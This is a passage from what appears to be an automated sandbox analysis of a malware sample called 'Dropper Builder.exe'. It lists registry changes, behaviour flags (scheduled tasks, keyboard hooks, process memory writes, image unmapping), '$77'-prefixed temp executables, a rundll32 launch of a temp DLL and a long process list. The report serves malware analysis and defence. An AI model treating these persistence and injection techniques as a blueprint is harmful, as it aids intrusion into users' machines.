| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Videos" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "4" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Vid = "{0057D0E0-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133626137163497364" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Videos" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\IconSize = "96" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\LogicalViewMode = "3" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Downloads\Dropper Builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 5e00310000000000d658143010004e4557464f4c7e310000460009000400efbed6581430d65814302e000000cca90200000003000000000000000000000000000000aae21d004e0065007700200066006f006c00640065007200000018000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Videos" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} | C:\Windows\Explorer.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Dropper Builder.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION | C:\Windows\Explorer.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2780 -ip 2780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 448
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb10ceab58,0x7ffb10ceab68,0x7ffb10ceab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4132 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4444 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4252 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4688 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4908 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
